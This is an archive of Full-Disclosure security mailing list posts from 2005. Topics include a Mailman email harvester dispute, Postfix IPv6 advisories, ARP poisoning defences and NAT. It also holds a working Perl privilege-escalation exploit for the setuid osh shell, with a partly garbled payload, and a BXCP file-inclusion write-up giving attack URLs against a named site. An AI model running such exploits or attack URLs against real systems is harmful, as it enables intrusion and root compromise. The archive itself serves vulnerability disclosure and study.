> >   Why?  You hoping to sell it to spammers?  Obfuscating *works*; if YOU
> > break it, that makes YOU a spamming motherfucker.  Why don't you go fuck
> > yourself instead?
>
> The name of the list is Full-Disclosure.  This is like saying "gets()
> works, if you show that it's unsafe, that makes YOU an evil evil hacker."

  He's already shown the POC "To raise awareness to this issue", and I have
no complaint about that.  But to continue and develop it into an actual
usable production-level tool serves no further purpose in raising awareness
and seems to me to be crossing the line into malware authoring; it's like
the difference between writing a POC showing a bug in SQL server and writing
MSBlast.

cheers,
  DaveK
-- 
Can't think of a witty .sigline today



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Homograph attack fools (older versions of) Internet Explorer too

[Kevin Connolly]

Use of Unicode codes in the href fools older versions of IE when it parses
the hostname part.
Obviously this has been fixed in a previous patch (my bad for not checking with
a fully patched machine first! )
NOT vulnerable  IE 6.0.2800.1106.xpsp2.040919-1003C0
vulnerable  IE 6.0.2800.1106.xpsp2.030422-1633
I may get around to writing up the details but it is not urgent now that
I know that fully patched IE is not vulnerable to this.
Kevin
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: mailman email harvester

[Bernhard Kuemel]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Dana Hudes wrote:
| The report is good. Attaching the results in their entirety gives
| spammers who don't have your technical capability, not to mention
|  script kiddies looking for victims for their viruses, a huge leg
| up. Irresponsible doesn't begin to describe it.
So let's shut down full-disclosure.
| More appropriate would be specimens and a description of
| methodology.
I informed the mailman developers about the problem more than a year
ago and the number of vulnerable lists only increased:
http://www.mail-archive.com/mailman-developers@python.org/msg06853.html
If they don't spread the word someone else has to do it. I'm not
worried about the 60,000 email addresses. They asked for being this
example by being public. Let's hope this will make list admins
secure the addresses which are only available to subscribers (which
are a lot more).
Bye, Bernhard
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.5 (GNU/Linux)
Comment: Using GnuPG with Debian - http://enigmail.mozdev.org
iD8DBQFCChum9zL78+QhnUgRAoO8AJ9E3ph/U0Czys+Zx2Dorzx/AamfYACfaELr
G+d9ospmfb902OzDZM4ci24=
=wzz9
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: mailman email harvester

[Bernhard Kuemel]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Dave Korn wrote:
|>An improved version that collects addresses that are restricted to
|>subscribers, processes more lists and works more parallelized is
|>planned.
|
|
| Why?
The addresses of mailing list subscribers are top quality to
spammers. It's just a matter of time until one exploits this. I'd
rather want us to close this hole before this happens.
| You hoping to sell it to spammers?
I'm on the anti spammers side, but hey, I'm rather low on money so
if theres a good offer, I just might do that. 1 cent/address. If it
collects 1 million addresses, that would be 10,000 euros. That's my
price. And there are programmers who don't have objections working
for spammers. They even make worms that act as mail relays. See how
real the danger is?
| Obfuscating *works*;
The report you cited is about individuals obfuscating addresses in
individual ways. Mailman is a widespread mailing list manager and
obfuscates very many addresses in a uniform way. This makes it much
more attractive for spammers. If you hoped this would remain
unnoticed by spammers I'm sorry to disappoint you, but security by
obscurity does not work.
| if YOU break it, that makes YOU a spamming motherfucker.
This seems to bother you. Would you feel better if someone else did
it without anyone noticing it? Hey, it may already be happening.
| Why don't you go fuck yourself instead?
I'm too busy fucking my girl friend.
|   Oh, and by the way
|
| <[EMAIL PROTECTED]>
Uh, fuck!
Oh, BTW, obscuring or hiding email addresses wont's solve the
problem. Hashcash or ecash probably will.
Bernhard
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.5 (GNU/Linux)
Comment: Using GnuPG with Debian - http://enigmail.mozdev.org
iD8DBQFCCg069zL78+QhnUgRAkaYAKCCBJ4joy49YPcxwVL4ZRAVcKmTtgCfSQc3
OvDsFCwDyg0tTnLd84RcpWg=
=iNhD
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Local *.php file inclusion and full path disclosure in BXCP <= 0.2.9.7

[Majest]

Author:  [OfB|FistFucker]  -  (Majest)
Contact: http://www.ofb-clan.de/
I've reported the vulnerability to the programmer of BXCP. He released a 
patch for 'index.php' and a new version (0.2.9.8). You can get it from: 
http://www.bxcp.com/

- Original Message - 
From: "Majest" <[EMAIL PROTECTED]>
To: 
Sent: Sunday, February 06, 2005 4:38 PM
Subject: Local *.php file inclusion and full path disclosure in BXCP <= 
0.2.9.7


Title:   Local *.php file inclusion and full path disclosure in BXCP <= 
0.2.9.7
Author:  [OfB|FistFucker]
Contact: http://www.ofb-clan.de/
#ofb-clan at irc.quakenet.org:6667

1. Local *.php file inclusion:
-
Because of no user input validation in 'index.php' it's possible to 
include
every local *.php file. Let's take a look at the most important part of 
the
source code:

 ~~ SOURCE CODE 
  $show = $_REQUEST['show'];
  require ("config.php");
  if (!file_exists("show/$show.php"))
  {
$notfound = $show;
$show = 'error';
  }
  $page = "show/$show.php";
  END ~~
 Yeah, there is no validation of the variable '$show'. So we can easily 
access
 every local file ending with '.php', also in restricted directories like
 htaccess. We can easily jump outside the 'show' directory and include 
every
 file ending with '.php'!

 Example URL: http://www.rz-liga.com/index.php?show=../intern/board/common
 Don't worry about the response "Hacking attempt". It's just a die() 
message
 from 'common.php' of their htaccess protected phpBB. ;-)

2. Full path disclosure:
---
 And by including the 'index.php' into itself with the above vulnerability 
we
 can cause a full path disclosure.

 Example URL: http://www.rz-liga.com/index.php?show=../index
3. Let's fix that shit! =)
-
 Just replace in 'index.php':
 ~~ SOURCE CODE 
  $show = $_REQUEST['show'];
  if(ereg("\.\.", $show))
  {
$show = '';
  }
  require ("config.php");
  if (!file_exists("show/$show.php"))
  {
$notfound = $show;
$show = 'error';
  }
  $page = "show/$show.php";
  END ~~
4. Greetings:

 Greetings fly out to all members of OfB-Clan that know me. And sorry for 
the
 events that occured at and after the 25th December. Please forgive me and
 please stop seeing me as a criminal kiddie. Better see me as a guardian! 
=D


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: mailman email harvester

[J b]

Take a look at the date of that report. That it's from almost TWO
YEARS ago! The spammer/anti-spammer arms race began a long time ago,
and will only get worse.

I've seen numerous harvesters with randomized User-Agent strings
crawling a mail archive of mine, even though all output is filtered
through Apache::AntiSpam. They are NOT stopped by simple, obvious
regexps. Obfuscation is trivially easy to identify and defeat.

-Original Message-
From: Dave Korn [EMAIL PROTECTED] 
Sent: Tuesday, February 08, 2005 9:53 AM
To: full-disclosure@lists.netsys.com
Cc: mailman-developers@python.org; bugtraq@securityfocus.com
Subject: [Full-Disclosure] Re: mailman email harvester

  Yes, but no spammers actually do so.  For experimental proof of
this
claim,

http://www.cdt.org/speech/spam/030319spamreport.shtml



__ 
Do you Yahoo!? 
Take Yahoo! Mail with you! Get it on your mobile phone. 
http://mobile.yahoo.com/maildemo 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: [USN-74-1] Postfix vulnerability

[LaMont Jones]

On Sun, Feb 06, 2005 at 09:20:38PM +0100, Martin Pitt wrote:
> This is already fixed in Sarge/Sid. However, I'm not sure about woody.
> LaMont, does Woody already include the IPv6 patch?

IPV6 support (from the third party patch) was introduced to Debian
in 2.1.1-2, woody has 1.1.11-0.woody3, sid/sarge have the fixed version.

lamont
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: mailman email harvester

[James Longstreet]

On Tue, 8 Feb 2005, Dave Korn wrote:

>   Why?  You hoping to sell it to spammers?  Obfuscating *works*; if YOU
> break it, that makes YOU a spamming motherfucker.  Why don't you go fuck
> yourself instead?

The name of the list is Full-Disclosure.  This is like saying "gets()
works, if you show that it's unsafe, that makes YOU an evil evil hacker."

> <[EMAIL PROTECTED]>
> <[EMAIL PROTECTED]>
> <[EMAIL PROTECTED]>
> <[EMAIL PROTECTED]>
> <[EMAIL PROTECTED]>
> <[EMAIL PROTECTED]>
> <[EMAIL PROTECTED]>
> <[EMAIL PROTECTED]>

Just childish (and uneffective), really.

think more,
James Longstreet
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: mailman email harvester

[Dave Korn]

"Bernhard Kuemel" <[EMAIL PROTECTED]> wrote in message
news:[EMAIL PROTECTED]
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Hi!
>
> Tons of email addresses from mailman mailing lists are vulnerable to
> be collected by spammers.
>
> They are "protected" by obfuscation ([EMAIL PROTECTED] -> user at
> example.com) and access to the subscriber list can be restricted to
> subscribers. The obfuscation is trivially reversed and harvester
> scripts can subscribe to gain access to restricted lists.

  Yes, but no spammers actually do so.  For experimental proof of this
claim,

http://www.cdt.org/speech/spam/030319spamreport.shtml

" But none of the addresses that were obscured, whether in "human-readable"
or "HTML-obscured" form, received a single piece of spam, leading us to
conclude that e-mail address "harvesters" are not presently capable of
collecting such addresses. While this may change as time passes and
technology develops, for the time being it appears that obscuring an e-mail
address is an effective means of avoiding spam. "

  The harvesters don't bother because there are so many un-obfuscated email
addresses out there, enough to keep them busy for a lifetime of spamming,
anyway.

> An improved version that collects addresses that are restricted to
> subscribers, processes more lists and works more parallelized is
> planned.

  Why?  You hoping to sell it to spammers?  Obfuscating *works*; if YOU
break it, that makes YOU a spamming motherfucker.  Why don't you go fuck
yourself instead?

  Oh, and by the way

<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>



drop dead,
  DaveK
-- 
Can't think of a witty .sigline today



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Software Licenses and compression (was: Multiple AV Vendors ignoring tar.gz archives)

[James Eaton-Lee]

On Mon, 2005-02-07 at 14:58 -0500, bkfsec wrote:
> James Eaton-Lee wrote:
> 
> >Add to this the fact that implementing archive support in an antivirus
> >package isn't as simple as it might seem; although bz2 is released under
> >a BSD license, gzip isn't - it's GPL, and therefore any antivirus vendor
> >would have to write their gzip code totally from scratch. 
> >
> 
> Now this is a non-sequitor.  It's a non-sequitor for two reasons: 1) 
> It's irrelivent and 2) It's wrong.
> 
> First, it's irrelivent because if this is a percieved weakness of an 
> antivirus package (and I can see how someone can see it as undesirable 
> under certain conditions, though not all conditions) then its 
> implementation isn't the concern of the reporter.  We know that it can 
> be done and, if it's of high enough value, it should be done -- 
> irregardless of whether they get the code from a third party or write it 
> themselves.
> 
> Second, it's wrong for a couple of reasons.  Yes, they would not be able 
> to take GNU gzip and implant the code into a proprietary application.  
> However, that does not bar them from utilizing and distributing GNU Gzip 
> with their application.  If they were to wish to use GNU Gzip, there are 
> ways that they could engineer that into their product without causing 
> licensing issues.  They could simply use gzip/tar to gunzip/untar the 
> package as a stream and pass that into their preprocessor for analysis 
> in their sandbox.  That would require no cross-polination of the 
> licenses and would leave the third party software intact.  These kinds 
> of arrangements are actually quite frequent in the world of software design.
> 
> Further, it's not like the gzip compression algorithm of some kind of 
> guarded secret proprietary protocol.  It's a standard protocol and there 
> are a number of proprietary implementations that could be licensed for 
> use in proprietary programs. 
> 
> In either case, including third-party software into a security product 
> can be a gambit and, as such, that code has to be heavily audited in 
> order to be included into the software suite.  Or, at least, it should 
> be heavily audited.  Anyway, they wouldn't be able to just take bzip2 
> and place it directly into the source of the AV system either.  
> Interfaces have to be crafted and tested, in order to be consistent.  
> You also have to take into account differences in the programming 
> environment for the AV/Compression scheme and optimizational concerns. 
> 
> In the end, your point in trying to differentiate the GNU GPL from the 
> BSD license here is completely and totally moot.  It does nothing but 
> predicate misunderstandings concerning the GNU GPL and further cloud 
> this potential security issue.

I wasn't trying to cloud the issue at all, nor was I specifically trying
to differentiate between the two - the paragraph you've just dissected
directly followed a statement about the relative lack of speed which
implementing archive support in an anti-virus package would necessitate
vs. simply writing a new antivirus definition, and the reference to GPL
and BSD software was preemptively negating a response along the lines of
'they could simply incorporate X source code'. 

I fully understand both the distinction between the two licenses, how
they can be implemented into a proprietary product, and the testing
involved in incorporating someone else's source code into a large
codebase - again, my point was that whether implementing gzip/bzip2/X
support in an antivirus package is hard or not, it is a reactive measure
which antivirus vendors do not (and should not) have to take, since
unlike antivirus definitions (which are necessarily written reactively),
compression support is easily integrated into a package - with
forethought - and prevents such issues further down the line; further to
that, I also argued that it would be silly to reactively implement
compression support not only because it's unnecessary, but also because
it would (as you have in fact agreed with me on) be harder to implement
this support into an anti-virus scanning engine even if, as you say,
this is a "standard protocol".

So I think you agree with me, really; thankyou for your e-mail! :)

 - James.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: SSH probe attack afoot?

[Barrie Dempster]

On Sun, 2005-02-06 at 10:09 -0500, Bernie Cosell wrote:
> We're now getting hammered with the third round of ssh probes in the last 
> four days [one from CA, one from Brazil and one from Virginia].  I was 
> wondering: is there some virus or the like floating around now that 
> leaves an ssh-hammering zombie in its wake?  Or is it just coincidental 
> that we have gotten three floods?
> 
> [the probes are just dozens of random-seeming login attempts with a bunch 
> of root-password-guesses interspersed]
> 
>   /Bernie\


Multiple SSH brute force tools,which has been covered on this list and
others a few times over the last year.

http://www.securityfocus.com/archive/75/[EMAIL 
PROTECTED]/2005-02-04/2005-02-10/0
http://www.google.com/search?num=100&hl=en&safe=off&q=ssh+brute
+force&spell=1

-- 
With Regards..
Barrie Dempster (zeedo) - Fortiter et Strenue

blog: http://zeedo.blogspot.com
site: http://www.bsrf.org.uk

[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]




signature.asc
Description: This is a digitally signed message part
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] re: Microsoft Outlook Web Access URL Injection

[Valdis . Kletnieks]

On Mon, 07 Feb 2005 09:27:25 PST, morning_wood said:
> looks like MS is NOT publicly releasing a fix for this, while they have the
> means and solution at hand.
> ( at least under IE )
> a kind reader sent this little snippet...
> 
> "... was able to get Microsoft to provide us with a DLL
> to drop under IIS 6 to compare URL variable against the Host: header
> variable and do 302 to web root if they are not similar.  This fixed the
> problem, however, I doubt that Microsoft will make this patch available to
> the public."
> 
> what happend to MS commitment to security???

They figured they'd spent the budget for the quarter for PR proclaiming their
commitment to security.  Remember - they're nowhere near as committed to
security as they are to the bottom line.  A $20M PR campaign will sway a lot
of managers, while a $200M project to actually fix things won't be noticed.
Which would *you* choose if you were them?

(Note that this is heavily dependent on corporate culture - for instance,
if some VP at Google tried that same money-saving stunt, he'd probably get
called in, pointed at the "Don't be evil" sign, and told to find some OTHER
way to save the $180M...  But as far as I know, there isn't any such sign
in Redmond)



pgpvFncOAqzw7.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] re: Microsoft Outlook Web Access URL Injection

[morning_wood]

looks like MS is NOT publicly releasing a fix for this, while they have the
means and solution at hand.
( at least under IE )
a kind reader sent this little snippet...

"... was able to get Microsoft to provide us with a DLL
to drop under IIS 6 to compare URL variable against the Host: header
variable and do 302 to web root if they are not similar.  This fixed the
problem, however, I doubt that Microsoft will make this patch available to
the public."

what happend to MS commitment to security???


ugg,

m.w
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Cain and Abel

[Dominik Birk]

> Static arp entries are _static_ (unchangable) for Linux.
> For Windows, Windows XP is first MS system that treat static as real 
> static - in previous versions "static" means that is times-out not so 
> often (but could be changed)

I have tried to put some static ARP-entries under WinXP. No way, it
changed the whole time, when you send new ARP-Replies. 
How did you make the static entries? 

arp -s [dns] [mac]

My experiences are, that this command ist not very effectively.

> For other OSes? dunno.

NetBSD brings error-messages when receiving new ARP-Replies, but doesn't
change the ARP-Cache.

> Piw

Dominik

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Cain and Abel

[Piw]

Nick Vasiliev wrote:
> I have tried to set up static arp mappings on my system however the
> new ones overwrote the old ones. Also I am not sure but does it also
> screw with switch's arp tables or just the client ones? Any feedback
> would be nice
Yes, such attack re-map port<->mac pair in "plain" switches.
Static arp entries are _static_ (unchangable) for Linux.
For Windows, Windows XP is first MS system that treat static as real 
static - in previous versions "static" means that is times-out not so 
often (but could be changed)
For other OSes? dunno.

Piw
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: [USN-74-1] Postfix vulnerability

[Martin Pitt]

Hi!

Wietse Venema [2005-02-05 17:09 -0500]:
> FYI,
> 
> This is a bug in a third-party IPv6 patch that is not part of Postfix.
> 
> Neither the official Postfix release, nor the work-in-progress
> version are not affected by this.

I am aware of this, but thanks for the notification.

The Ubuntu advisories (and in fact the advisories of all
Distributions) mostly talk about packages, which do not exactly
correspond to the "official" original releases (which we
call"upstream" releases). The Ubuntu package contains the IPv6 patch,
and since it is called "postfix", I just name it like this.

Sorry for any confusion this might cause.

Have a nice day,

Martin

-- 
Martin Pitt   http://www.piware.de
Ubuntu Developerhttp://www.ubuntulinux.org
Debian GNU/Linux Developer   http://www.debian.org


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: [USN-74-1] Postfix vulnerability

[Martin Pitt]

Hi!

FRLinux [2005-02-06  2:08 +]:
> On Sat, 5 Feb 2005 17:09:57 -0500 (EST), Wietse Venema
> <[EMAIL PROTECTED]> wrote:
> > FYI,
> > 
> > This is a bug in a third-party IPv6 patch that is not part of Postfix.
> > 
> > Neither the official Postfix release, nor the work-in-progress
> > version are not affected by this.
> 
> Hello,
> 
> Does this affect the Debian version (which is v6 enabled) ?

This is already fixed in Sarge/Sid. However, I'm not sure about woody.
LaMont, does Woody already include the IPv6 patch?

Martin

-- 
Martin Pitt   http://www.piware.de
Ubuntu Developerhttp://www.ubuntulinux.org
Debian GNU/Linux Developer   http://www.debian.org


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: [USN-74-1] Postfix vulnerability

[FRLinux]

On Sat, 5 Feb 2005 17:09:57 -0500 (EST), Wietse Venema
<[EMAIL PROTECTED]> wrote:
> FYI,
> 
> This is a bug in a third-party IPv6 patch that is not part of Postfix.
> 
> Neither the official Postfix release, nor the work-in-progress
> version are not affected by this.

Hello,

Does this affect the Debian version (which is v6 enabled) ?

Steph
-- 
"Step by step, penguins are taking my sanity apart ..."
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: [USN-74-1] Postfix vulnerability

[Wietse Venema]

FYI,

This is a bug in a third-party IPv6 patch that is not part of Postfix.

Neither the official Postfix release, nor the work-in-progress
version are not affected by this.

Wietse

Martin Pitt:
> Jean-Samuel Reynaud noticed a programming error in the IPv6 handling
> code of Postfix when /proc/net/if_inet6 is not available (which is the
> case in Ubuntu since Postfix runs in a chroot). If "permit_mx_backup"
> was enabled in the "smtpd_recipient_restrictions", Postfix turned into
> an open relay, i. e. erroneously permitted the delivery of arbitrary
> mail to any MX host which has an IPv6 address.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Operator Shell (osh) BSS-based Buffer Overflow

[Charles Stevenson]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

#!/usr/bin/perl 
###
#
# OSH 1.7 Exploit
#
# EDUCATIONAL purposes only :-)
#
# by Charles Stevenson (core) <[EMAIL PROTECTED]>
#
# Description:
# The Operator Shell (Osh) is a setuid root, security enhanced, restricted
# shell. It allows the administrator to carefully limit the access of special
# commands and files to the users whose duties require their use, while
# at the same time automatically maintaining audit records. The configuration
# file for Osh contains an administrator defined access profile for each
# authorized user or group.
#
# Problem:
# The patch for the overflows published by Steve Kemp seems lacking. If the 
# following requirements are met we can overflow within the iopen() function: 
# osh must be invoked in non-interactive mode, argv[1] must be a valid command 
# according to /etc/osh.conf (e.g. osh help $(perl -e 'print "A"x8192')). The 
# offending code can be found at main.c:305
#
#if (found) { /* It's a command, input is a string */
#  inputfp=(FILE *)1;
#  strcpy(inputstring, argv[1]); //XXX: command is copied into inputstring
#  for (i=3;i<=argc;i++) {
#   strcat(inputstring, " "); //XXX: it adds a space
#   strcat(inputstring, argv[i-1]); //XXX: and now overflow is possible
#  }
#  strcat(inputstring, "\n"); /* So it's a command */
#
# So far so good. Looking at the declaration `static char inputstring[1024];'
# we can see that overflow is indeed possible. Here's the layout of memory:
#
#+--+
#|   Memory Layout  |
#+--+
#|0x804e340|
#|0x804e344 |
#|0x804e348   |
#|0x804e34c   |
#+-(can munge everything below)-+
#|0x804e360|
#|0x804e760   |
#|0x804e764   |
#|0x804e778   |
#|0x804e780  |
#|0x804f380|
#|0x804f3a0   |
#|0x804f540  |
#|0x804f860 |
#|0x804f864 |
#+--+
#
# Table stores a bunch of function pointers to all the routines whether
# internally implemented or called via execv. So I decided to try and
# overwrite the first entry with the address of my shellcode. There were
# several obstacles in between me and my rootshell though. First was a
# loop that performed strcmp's on AliasList items. Rather than fill that
# out I found that I could conveniently set AliasCounter to -1 and skip
# the loop entirely. Next I found that if argv[1] was a builtin command
# and NUMENTRY was a positive integer I could set Table[0].prog_name to match
# argv[1] and it'd call Table[0].handler (So I found "exit" in the executable
# itself thanks to `static struct hand Internal[]'). From main.c:1032
#
#  while (i\n\n";

# Clear out the environment. 
foreach $key (keys %ENV) { delete $ENV{$key}; } 

# Setup simple env so ret is easier to guess
$ENV{"HELLCODE"} = "$sc"; 
$ENV{"TERM"} = "linux"; 
$ENV{"PATH"} = "/usr/local/bin:/usr/bin:/bin"; 

# Create the payload...
$egg = "&"x1019 . # pad up to NUMENTRY
   pack("l",0x01d5c001) . # overwrite with a positive int
   "&"x20 .   # ampersand gets pas TTOOLONG
   pack("l",0x) . # AliasCounter = -1 skips for loop
   "core" .   # shameless self-promotion
   $exit_addy .   # address of "exit"
   pack("l",0xbe30) . # address of shellcode in ENV
   $exit_addy;# address of a NULL terminated string
system("/usr/sbin/osh exit '$egg'"); 

# EOF

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFCBPvuGAuLrxOyeJMRApfcAKCwlfuoaGY9KgYFUi5l9smAVk2M7QCfbP9U
yLucDlmKDkwJ3QcpNfJjIbs=
=k8Vs
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: [Linux kernel ipv6_setsockopt integer overflow]

[qobaiashi]

Am Donnerstag, 3. Februar 2005 22:47 schrieb Dan Yefimov:
> On Thu, 3 Feb 2005, qobaiashi wrote:
>
> There's no integer overflow here since there's the test for optlen < 0 in
> linux/net/socket.c

himmelarschundzwirn! you're rite .. i'm sure it wasn't there when i was 
lokoing for it :)

...thx
-- 

-q/UNF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Re: NAT router inbound network traffic subversion

[fd]

This topic is debated once every 12 months on the firewall-wizards list -
you could check the archives there.

You cannot get a packet in from the outside on PAT (port translated NAT, NAT
overload, etc) to a client that is idle. Actually, that may be a lie given
that there used to be a bunch of crappy NAT equipment that would accept
packets addressed to the correct internal IP, but that mostly doesn't happen
anymore, and it's an implementation thing. 

This is the part that could be considered a security feature, since it is
the only real incremental security compared to connecting directly. 

You talk about this being 'intractable' rather than 'impossible'. This isn't
correct. It is genuinely impossible in a reference implementation, since
there is no state entry to allow the traffic, and traffic not allowed is
denied. In real life that gets blurry. NAT entries that don't get torn down,
dumb implementations that remember too much of their routing roots, overload
behaviour etc could mean that you might find a way to do it on a certain
box, but the basic behaviour is axiomatic.

You can attack existing connections - DNS spoofing, blind TCP MitM (or not
blind if you're close enough), UDP packet injection in general. These are
all a class of attack exploiting the simplicity of NAT states
(internalIP:internalPort->onesingleIP:Port), but they require a spoofable
protocol.

Basically, those attacks are not all that much harder or easier than if the
connection did not use NAT, and rely on most of the same conditions,
including the ability to sniff the connection to have any real chance of
blind TCP MitM. NAT adds an additional barrier if you actually care which
machine you are attacking, and some of the previous people have sent links
to the various ipid and other techniques to work out who is who from the
outside.

morning_wood's scenario is neither more nor less difficult / likely,
irrespective of the presence of NAT; it works but is orthogonal to the NAT
security issue. Mostly the same for Mark Senior's excellent DNS response
injection example (although if that attack is carried out blind there is an
extra complication because the client source port will often be changed by a
PAT router).

Cheers,

ben

> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf 
> Of Kristian Hermansen
> Sent: Friday, January 28, 2005 4:37 PM
> To: full-disclosure@lists.netsys.com
> Subject: [Full-Disclosure] Re: NAT router inbound network 
> traffic subversion
> 
> I think the answers that I received in response to my query 
> are somewhat
> obvious -- yes -- but neither answered my question!  Morning Wood's
> analysis was brilliant as ever, like always ;-P
> 
> "atacker now can do a he wishes to the rest of your network ( GAME
> OVER )"
> 
> Ummm...okay.  The problem with you was this statement:
> 
> "NAT client browses web..."
> 
> HOW IS THIS NOT USER INTERACTION?!?!?  I asked if there is a 
> computer on
> the internal network that doesn't do anything -- that means SENDING NO
> PACKETS to the router -- if an attacker can get EVEN ONE 
> PACKET inside:
> then they will prove everyone wrong, right?  If one packet can get
> through, it can be considered a rogue packet that should not have
> entered the internal network destined for a particular host 
> -- or better
> yet -- an internal broadcast address going to all hosts.
> 
> Some say getting these rogue packets into the network is "impossible".
> That is the reason for my question.  I like to think that 
> most problems
> are "intractable", but not "impossible".  Can anyone prove me wrong?
> Can someone push a rogue packet behind a router with no client
> interaction???  This is my chautauqua...
> -- 
> Kristian Hermansen <[EMAIL PROTECTED]>
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: [Linux kernel ipv6_setsockopt integer overflow]

[Dan Yefimov]

On Thu, 3 Feb 2005, qobaiashi wrote:

There's no integer overflow here since there's the test for optlen < 0 in 
linux/net/socket.c

> 
> there exists an integer bug in the ipv6 implementation of the linux kernel.
> (at least in 2.4.20 and 2.6.4 )
> in /linux/net/ipv6/ipv6_sockglue.c:
> 
> 
> int ipv6_setsockopt(struct sock *sk, int level, int optname, char *optval,
>int optlen)
> {
> struct ipv6_pinfo *np = inet6_sk(sk);
> int val, valbool;
> int retv = -ENOPROTOOPT;
> 
> if (level == SOL_IP && sk->sk_type != SOCK_RAW)
> return udp_prot.setsockopt(sk, level, optname, optval,optlen);
> 
> if(level!=SOL_IPV6)
> goto out;
> 
> if (optval == NULL)
> val=0;
> else if (get_user(val, (int *) optval))
> return -EFAULT;
> 
> valbool = (val!=0);
> 
> lock_sock(sk);
> 
> switch (optname) {
>  [...]
> 
>  case IPV6_PKTOPTIONS:
> {
> struct ipv6_txoptions *opt = NULL;
> struct msghdr msg;
> struct flowi fl;
> int junk;
> 
> fl.fl6_flowlabel = 0;
> fl.oif = sk->sk_bound_dev_if;
> 
> [1]if (optlen == 0)
> goto update;
> 
> /* 1K is probably excessive
>  * 1K is surely not enough, 2K per standard header is 16K.
>  */
> retv = -EINVAL;
> [2] if (optlen > 64*1024) 
> break;
> 
> [3]opt = sock_kmalloc(sk, sizeof(*opt) + optlen, GFP_KERNEL);
> retv = -ENOBUFS; sizeof(*opt)+0xfff8
> if (opt == NULL)
> break;
> 
> [4]memset(opt, 0, sizeof(*opt));
> opt->tot_len = sizeof(*opt) + optlen;
> retv = -EFAULT;
> [5]if (copy_from_user(opt+1, optval, optlen))
> [...]
> 
> details:
> 
> condition [1] and [2] are easily passed for a value like -100, then at [3] 
> sock_kmalloc allocates a too small object of the size (sizeof(*opt) + (-100))
> which is then overflowed in [4] and [5] leading to a dos of the kernel...
> 
> that's it 
> over and out!
> 
> 

-- 

Sincerely Your, Dan.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Cain and Abel

[Ill will]

there is a few programs to detect arp poisoning 
i.e. ethereal can detect the huge amount of traffic flow
there's a window app winarpwatch
http://www.arp-sk.org/files/related/warpwatch.zip
 that is a windows clone of the nix program arpwatch that basically
checks to see if your arp cache has changed
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Cain and Abel

[J. Oquendo]

On Thu, 3 Feb 2005, Paul Melson wrote:

> A more manageable defense against ARP poisoning attacks is to configure your
> switches to prevent against MAC address spoofing.  Cisco switches, for
> example, can statically map the MAC address of the interface connected to a
> given port (good for servers), as well as limit the number of MAC addresses
> that can appear on a given port (good for workstations, conference rooms,
> hotel rooms, etc.).

802.1q and Cisco PVLAN's will suffice by segmentation to minimize the
effects of programs like Cain and Abel. However, most people forget that
at the core level any product be it a switch (layer 2 or 3) or router will
still have to listen for broadcasts in order to get MAC information to
delegate traffic. If someone just wanted to sit there and DoS your ARP
tables to oblivion it wouldn't be hard. VLAN tagging has its insecurities
as well. You could likely just roast someone's connection if you're on
their segment as well via spoofing however you're limited to that segment.

http://infiltrated.net/cisco/pvlans.html
